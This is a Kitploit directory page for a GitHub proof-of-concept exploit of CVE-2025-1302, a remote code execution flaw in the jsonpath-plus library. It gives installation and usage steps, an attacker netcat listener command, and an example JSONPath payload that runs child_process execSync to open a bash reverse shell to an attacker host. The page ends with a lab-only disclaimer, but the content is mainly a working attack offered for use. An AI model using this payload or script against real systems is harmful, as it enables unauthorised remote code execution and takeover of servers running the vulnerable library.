Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus. | Kitploit
Tools/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-1302 JSONPath-Plus RCE PoC

PoC Script Name: poc.py

A proof-of-concept exploit script for CVE-2025-1302, which targets an RCE vulnerability in the jsonpath-plus library. When run against a vulnerable service endpoint, the script attempts to trigger remote code execution via a JSONPath payload and establish a reverse shell back to the attacker.


Features

  • Flexible HTTP methods: Supports POST, GET, or AUTO (POST with GET fallback) via --method or --no-fallback flags.
  • Custom payloads: Load one or more JSONPath RCE payload templates from a file, with {ip} and {port} templating.
  • Built-in default payload: If no payload file is provided, uses a fully-formed bash reverse shell template.
  • Verbose debugging: Prints full request/response bodies for both POST and GET attempts when they fail.
  • Progress indicators: Displays delay and payload loops with tqdm progress bars.
  • Logging: Optionally save all results to a JSON file with --output.
  • Installation

    1. Clone this repository:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. Install dependencies (requires Python 3.6+):

      root@kitploit:~
      pip install -r requirements.txt
      

    Usage

    1. Start a listener on your attacker machine (replace port as needed):

      root@kitploit:~
      nc -lvnp 9999
      
    2. Run the PoC:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: File containing one JSONPath payload per line. Use {ip} and {port} placeholders.
    • --delay: Seconds to wait before sending payloads (shows countdown).
    • --method: Force POST, GET, or AUTO (default).
    • --no-fallback: Shorthand to skip any GET retry (equivalent to --method POST).
    • --output: Path to save JSON log of attempts.

    Example Payload File

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    Contribution

    1. Fork the repo and create a feature branch.
    2. Submit a pull request with your changes.

    Disclaimer

    Use this script only in controlled lab environments against systems you own or have explicit permission to test. Abuse may be illegal and unethical.

    Download Tool